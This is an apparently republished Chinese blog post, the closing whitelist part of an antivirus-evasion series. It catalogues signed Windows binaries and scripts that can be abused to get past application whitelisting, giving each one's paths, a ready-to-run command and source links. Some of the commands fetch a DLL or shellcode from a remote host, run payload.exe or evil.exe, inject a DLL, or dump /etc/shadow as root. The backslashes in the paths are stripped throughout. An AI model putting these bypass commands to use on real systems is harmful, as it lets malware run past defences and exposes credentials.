    C:Program Files (x86)Windows Kits10Debuggersx64cdb.exe
    C:Program Files (x86)Windows Kits10Debuggersx86cdb.exe

    执行方式:

    cdb.exe -cf x64_calc.wds -o notepad.exe

    参考资料:

    http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
    
    https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
    
    https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda

    csi.exe

    使用说明:

    和dnx一样csi和rcsi都可以执行C#代码,但csi是交互式的而rcsi不是。

    文件路径:

    c:Program Files (x86)Microsoft Visual Studio2017CommunityMSBuild15.0BinRoslyncsi.exe
    c:Program Files (x86)Microsoft Web ToolsPackagesMicrosoft.Net.Compilers.X.Y.Ztoolscsi.exe

    执行方式:

    rcs.exe bypass.csx

    参考资料:

    https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html
    https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

    Devtoolslauncher.exe

    使用说明:VS/VScode安装后引入的一个程序。

    文件路径:

    c:windowssystem32devtoolslauncher.exe

    执行方式:

    devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test
    devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test

    参考资料:

    https://twitter.com/_felamos/status/1179811992841797632

    dnx.exe

    使用说明:

    .NET Execution Environment(DNX) 是一个SDK 和运行时环境,它包含所有的你需要创建和运行.net应用程序的组件。可以执行C#代码

    执行方式:

    dnx.exe consoleapp

    参考资料:

    https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

    Dotnet.exe

    使用说明:

    .NET Framework安装后引入的程序

    文件路径:

    C:Program Filesdotnetdotnet.exe

    执行方式:

    dotnet.exe [PATH_TO_DLL]

    参考资料:

    https://twitter.com/_felamos/status/1204705548668555264

    Dxcap.exe

    使用说明:

    Visual Studio中自带的DirectX诊断调试工具。

    文件路径:

    C:WindowsSystem32dxcap.exe
    C:WindowsSysWOW64dxcap.exe

    执行方式:

    https://twitter.com/harr0ey/status/992008180904419328

    参考资料:

    Dxcap.exe -c C:WindowsSystem32notepad.exe

    Excel.exe

    使用说明:Microsoft Office 表格程序。

    文件路径:

    C:Program Files (x86)Microsoft Office 16ClientX86RootOffice16Excel.exe
    C:Program FilesMicrosoft Office 16ClientX64RootOffice16Excel.exe
    C:Program Files (x86)Microsoft OfficeOffice16Excel.exe
    C:Program FilesMicrosoft OfficeOffice16Excel.exe
    C:Program Files (x86)Microsoft Office 15ClientX86RootOffice15Excel.exe
    C:Program FilesMicrosoft Office 15ClientX64RootOffice15Excel.exe
    C:Program Files (x86)Microsoft OfficeOffice15Excel.exe
    C:Program FilesMicrosoft OfficeOffice15Excel.exe
    C:Program Files (x86)Microsoft Office 14ClientX86RootOffice14Excel.exe
    C:Program FilesMicrosoft Office 14ClientX64RootOffice14Excel.exe
    C:Program Files (x86)Microsoft OfficeOffice14Excel.exe
    C:Program FilesMicrosoft OfficeOffice14Excel.exe
    C:Program Files (x86)Microsoft OfficeOffice12Excel.exe
    C:Program FilesMicrosoft OfficeOffice12Excel.exe
    C:Program FilesMicrosoft OfficeOffice12Excel.exe

    执行方式:

    Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

    参考资料:

    https://twitter.com/reegun21/status/1150032506504151040
    https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

    Mftrace.exe

    使用说明:Media Foundation Tools的跟踪日志生成工具。

    文件路径:

    C:Program Files (x86)Windows Kits10bin10.0.16299.0x86
    C:Program Files (x86)Windows Kits10bin10.0.16299.0x64
    C:Program Files (x86)Windows Kits10binx86
    C:Program Files (x86)Windows Kits10binx64

    执行方式:

    Mftrace.exe cmd.exe

    参考资料:

    https://twitter.com/0rbz_/status/988911181422186496

    msxsl.exe

    使用说明:

    根据Microsoft的msxsl.exe命令行程序,用户能够使用Microsoft XSL处理器执行命令行可扩展样式表语言(XSL)。 但是,这个二进制文件可以用来执行恶意的JavaScript代码并绕过应用程序白名单保护。

    执行方式:

    msxsl.exe customers.xml script.xsl
    msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

    参考资料:

    https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
    
    https://twitter.com/subTee/status/877616321747271680
    
    https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker

    Powerpnt.exe

    使用说明:Microsoft Office 的ppt程序。

    文件路径:

    C:Program Files (x86)Microsoft Office 16ClientX86RootOffice16Powerpnt.exe
    C:Program FilesMicrosoft Office 16ClientX64RootOffice16Powerpnt.exe
    C:Program Files (x86)Microsoft OfficeOffice16Powerpnt.exe
    C:Program FilesMicrosoft OfficeOffice16Powerpnt.exe
    C:Program Files (x86)Microsoft Office 15ClientX86RootOffice15Powerpnt.exe
    C:Program FilesMicrosoft Office 15ClientX64RootOffice15Powerpnt.exe
    C:Program Files (x86)Microsoft OfficeOffice15Powerpnt.exe
    C:Program FilesMicrosoft OfficeOffice15Powerpnt.exe
    C:Program Files (x86)Microsoft Office 14ClientX86RootOffice14Powerpnt.exe
    C:Program FilesMicrosoft Office 14ClientX64RootOffice14Powerpnt.exe
    C:Program Files (x86)Microsoft OfficeOffice14Powerpnt.exe
    C:Program FilesMicrosoft OfficeOffice14Powerpnt.exe
    C:Program Files (x86)Microsoft OfficeOffice12Powerpnt.exe
    C:Program FilesMicrosoft OfficeOffice12Powerpnt.exe
    C:Program FilesMicrosoft OfficeOffice12Powerpnt.exe

    执行方式:

    Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

    参考资料:

    https://twitter.com/reegun21/status/1150032506504151040
    https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

    rcsi.exe

    使用说明:

    Visual Studio附带的非交互式命令行界面,和dnx一样rcsi可以执行C#代码,rcsi非交互式。

    执行方式:

    rcsi.exe bypass.csx

    参考资料:

    https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html
    https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

    Sqldumper.exe

    使用说明:Microsoft SQL附带的调试实用程序。

    文件路径:

    C:Program FilesMicrosoft SQL Server90SharedSQLDumper.exe
    C:Program Files (x86)Microsoft OfficerootvfsProgramFilesX86Microsoft AnalysisAS OLEDB140SQLDumper.exe

    执行方式:

    sqldumper.exe 464 0 0x0110

    参考资料:

    https://twitter.com/countuponsec/status/910969424215232518
    
    https://twitter.com/countuponsec/status/910977826853068800
    
    https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se

    Sqlps.exe

    使用说明:Microsoft SQL Server附带的用于加载SQL Server cmdlet的工具。

    文件路径:

    C:Program files (x86)Microsoft SQL Server100ToolsBinnsqlps.exe
    C:Program files (x86)Microsoft SQL Server110ToolsBinnsqlps.exe
    C:Program files (x86)Microsoft SQL Server120ToolsBinnsqlps.exe
    C:Program files (x86)Microsoft SQL Server130ToolsBinnsqlps.exe

    执行方式:

    Sqlps.exe -noprofile

    参考资料:

    https://twitter.com/bryon_/status/975835709587075072
    https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017

    SQLToolsPS.exe

    使用说明:

    Microsoft SQL附带的用于加载SQL Server cmdlts的工具。 替代sqlps.exe。 SQL Server 2016+中sqlps.exe的后继者。

    文件路径:

    C:Program files (x86)Microsoft SQL Server130ToolsBinnsqlps.exe

    执行方式:

    SQLToolsPS.exe -noprofile -command Start-Process calc.exe

    参考资料:

    https://twitter.com/pabraeken/status/993298228840992768
    https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017

    Squirrel.exe

    使用说明:

    Microsoft Teams安装的一部分,执行squirrel软件包。

    文件路径:

    %localappdata%MicrosoftTeamscurrentSquirrel.exe

    执行方式:

    squirrel.exe --download [url to package]
    squirrel.exe --update [url to package]
    squirrel.exe --updateRoolback=[url to package]

    参考资料:

    https://www.*******.com/watch?v=rOP3hnkj7ls
    
    https://twitter.com/reegun21/status/1144182772623269889
    
    
    http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
    
    
    https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
    
    https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

    Tracker.exe

    使用说明:Visual studio的一部分。需要1028子文件夹中的TrackerUI.dll,可以开启一个进程并注入dll, 当然也可以直接运行exe文件。

    执行方式:

    Tracker.exe /c "C:WindowsSystem32calc.exe"
    Tracker.exe /d .calc.dll /c C:Windowswrite.exe

    参考资料:

    https://twitter.com/subTee/status/793151392185589760
    https://attack.mitre.org/wiki/Execution

    Update.exe

    使用说明:

    Microsoft Teams安装的一部分,更新现有已安装的Nuget/squirrel软件包。

    文件路径:

    %localappdata%MicrosoftTeamsupdate.exe

    执行方式:

    Update.exe --download [url to package]
    Update.exe --update [url to package]
    Update.exe --updateRollback=[url to package]
    Update.exe --processStart payload.exe --process-start-args "whatever args"

    参考资料:

    https://www.*******.com/watch?v=rOP3hnkj7ls
    
    https://twitter.com/reegun21/status/1144182772623269889
    
    
    https://twitter.com/MrUn1k0d3r/status/1143928885211537408
    
    
    http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
    
    
    https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
    
    https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

    vsjitdebugger.exe

    使用说明:

    Visual Studio中的jit调试工具。

    文件路径:

    c:windowssystem32vsjitdebugger.exe

    执行方式:

    Vsjitdebugger.exe calc.exe

    参考资料:

    https://twitter.com/pabraeken/status/990758590020452353

    Wsl.exe

    使用说明:

    从Windows命令行运行Linux工具.

    文件路径:

    C:WindowsSystem32wsl.exe

    执行方式:

    wsl.exe -e /mnt/c/Windows/System32/calc.exe
    wsl.exe -u root -e cat /etc/shadow

    参考资料:

    https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

    脚本文件(4个)

    CL_Mutexverifiers.ps1

    使用说明:

    导入PowerShell Diagnostic CL_Mutexverifiers脚本,然后调用runAfterCancelProcess启动可执行文件。

    文件路径:

    C:WindowsdiagnosticssystemWindowsUpdateCL_Mutexverifiers.ps1
    C:WindowsdiagnosticssystemAudioCL_Mutexverifiers.ps1
    C:WindowsdiagnosticssystemWindowsUpdateCL_Mutexverifiers.ps1
    C:WindowsdiagnosticssystemVideoCL_Mutexverifiers.ps1
    C:WindowsdiagnosticssystemSpeechCL_Mutexverifiers.ps1

    执行方式:

    . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1   nrunAfterCancelProcess calc.ps1

    参考资料:

    https://twitter.com/pabraeken/status/995111125447577600

    CL_Invocation.ps1

    使用说明:

    windows自带的诊断工具,可以执行exe文件

    文件路径:

    C:WindowsdiagnosticssystemAEROCL_Invocation.ps1
    C:WindowsdiagnosticssystemAudioCL_Invocation.ps1
    C:WindowsdiagnosticssystemWindowsUpdateCL_Invocation.ps1

    执行方式:

    PS C:> . C:WindowsdiagnosticssystemAEROCL_Invocation.ps1
    PS C:> SyncInvoke cmd.exe "/c ipconfig > E:ip.txt"

    参考资料:

    https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/

    Manage-bde.wsf

    使用说明:

    用于管理BitLocker的脚本.

    文件路径:

    C:WindowsSystem32manage-bde.wsf

    执行方式:

    set comspec=c:windowssystem32calc.exe & cscript c:windowssystem32manage-bde.wsf
    copy c:userspersonevil.exe c:userspublicmanage-bde.exe & cd c:userspublic & cscript.exe c:windowssystem32manage-bde.wsf

    参考资料:

    https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
    https://twitter.com/bohops/status/980659399495741441

    Pester.bat

    使用说明:与app-v和发布服务器相关的脚本。

    文件路径:

    c:Program FilesWindowsPowerShellModulesPester3.4.0binPester.bat
    c:Program FilesWindowsPowerShellModulesPester*binPester.bat

    执行方式:

    Pester.bat [/help|?|-?|/?] "$null; notepad"

    参考资料:

    https://twitter.com/Oddvarmoe/status/993383596244258816

    后记

    免杀系列文章及相关软件下载:https://github.com/TideSec/BypassAntiVirus

    白名单篇终于完结,激动之情难以言表~~

    免杀专题文章终于也要接近尾声,撒花~~

  • 相关阅读:
    倒下
    我还能相信谁

    工作这点事
    人,这东西
    祝福
    路,公车和鞋子
    那片海
    document.querySelector bug All In One
    js logical or assignment bug All In One
  • 原文地址:https://www.cnblogs.com/0daybug/p/12735936.html
Copyright © 2011-2022 走看看